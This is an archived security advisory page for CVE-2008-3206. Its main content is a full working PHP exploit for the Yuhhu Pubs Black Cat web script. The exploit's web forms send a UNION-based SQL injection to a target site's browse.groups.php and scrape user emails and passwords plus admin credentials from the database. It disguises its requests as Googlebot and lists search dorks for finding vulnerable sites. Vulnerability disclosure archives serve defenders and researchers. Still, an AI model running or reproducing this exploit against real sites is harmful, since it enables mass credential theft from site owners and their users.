SecurityReason.com - Our Reason is

Security

Register | Forget Password | Login
SecurityReason
WLB
Services
RSS
Corporate
Note

If you have found a vulnerability, please send to our SecurityAlert Database :
secalert()securityreason()com

Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com

Home arrow SecurityAlert Database

Arrow  Topic :

Yuhhu Pubs Black Cat Remote SQL Injection Exploit


Arrow  SecurityAlert : 4008
Arrow  CVE : CVE-2008-3206
Arrow  CWE : CWE-89
Arrow  SecurityRisk : Medium  Security Risk Medium  (About)
Arrow  Remote Exploit : Yes
Arrow  Local Exploit : No
Arrow  Victim interaction required : No
Arrow  Exploit Available : Yes
Arrow  Credit : RMx
Arrow  Published : 20.07.2008

Arrow  Affected Software : Iamilkay, Yuhhu_pubs_black_cat



Arrow  Advisory Content :  

<?php

/*

Coded By RMx

Yuhhu Pubs Black Cat Remote SQL Injection Exploit

Coderx.Org & Biyosecurity.com

Thanx : Liz0zim - Otistiq

Script Demo & Sales :
http://www.iamilkay.net/index.php/scriptler/arkadaslikscriptleri/yuhhusc
ript/6-yuhhuserisi/8-pubs

Dork --> inurl: browse.groups.php

Dork 2 --> inurl:browse.events.php

Dork 3 --> browse.music.php

Dork 4 --> browse.groups.php

*/

set_time_limit(0);

error_reporting(0);

echo "

<title>Yuhhu Pubs Exploit [ Coded By RMx ]</title>

<form action='' method=post>

USERS EXPLOIT :<br>

Örnek :http://www.example.com<br>

<input type=text name='site'>

<input type=submit value=RMx>

</form>";

if (isset($_POST['site']))

{

$site=$_POST['site'];

$hacker="browse.groups.php?category=-1+union+select+1,2,3,concat(0x656D6
1696C3A20,email,0x206B756C6C616E6963693A20,username,0x2073696672653A20,p
assword),5,6,7,8,9+from+joovili_users";

$curl = curl_init();

curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);

curl_setopt($curl, CURLOPT_URL, $site."/".$hacker);

curl_setopt($curl, CURLOPT_USERAGENT, 'Googlebot/2.1
(+http://www.google.com/bot.html)');

curl_setopt($curl, CURLOPT_REFERER, 'http://www.google.com');

$html = curl_exec($curl);

curl_close($curl);

preg_match_all('#<td
class=\"text_4_css_bold\">(.*)<\/td>#',$html,$huseyin);

foreach ($huseyin[1] as $biyosecurity)

{

echo $biyosecurity ."<br>";

}

}

echo "

<form action='' method=post>

ADMIN EXPLOIT :<br>

Örnek :http://www.example.com<br>

<input type=text name='admin'>

<input type=submit value=RMx>

</form>";

if (isset($_POST['admin']))

{

$site=$_POST['admin'];

$hacker="browse.groups.php?category=-1+union+select+1,2,3,concat(0x206B7
56C6C616E6963693A20,admin_username,0x2073696672653A20,admin_password),5,
6,7,8,9+from+joovili_admins";

$curl = curl_init();

curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);

curl_setopt($curl, CURLOPT_URL, $site."/".$hacker);

curl_setopt($curl, CURLOPT_USERAGENT, 'Googlebot/2.1
(+http://www.google.com/bot.html)');

curl_setopt($curl, CURLOPT_REFERER, 'http://www.google.com');

$html = curl_exec($curl);

curl_close($curl);

preg_match_all('#<td
class=\"text_4_css_bold\">(.*)<\/td>#',$html,$huseyin);

foreach ($huseyin[1] as $biyosecurity)

{

echo $biyosecurity ."<br>";

}

}

?>



Arrow  References :

http://xforce.iss.net/xforce/xfdb/43782
http://www.securityfocus.com/bid/30221
http://www.securityfocus.com/archive/1/archive/1/494319/100/0/threaded
http://secunia.com/advisories/31077




Arrow  Feedback :

If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
Alert

libc:fts_*() Multiple Denial of Service

Security Risk Medium- 2009-10-02

The fts functions are provided for traversing UNIX file hierarchies...

Apache RSS Apache Alert

» Apache 1.3.41 mod_proxy
   Integer overflow (code
   execution)

» Apache Tomcat 6.0.20 and
   5.5.28 unexpected file
   deletion in work
   directory

» Apache Tomcat 6.0.20 and
   5.5.28 insecure partial
   deploy after failed
   undeploy

» Apache Tomcat 6.0.20 and
   5.5.28 unexpected file
   deletion and/or
   alteration

PHP RSS PHP Alert

» PHP 5.2.12/5.3.1
   session.save_path
   safe_mode and
   open_basedir bypass

» PHP 5.2.12/5.3.1 Multiple
   Vulnerabilities

» PHP 5.2.11 libgd multiple
   vulnerabilities

» PHP 5.2.11 tempnam()
   safe_mode bypass

Copyright © SecurityReason.com. All Rights Reserved.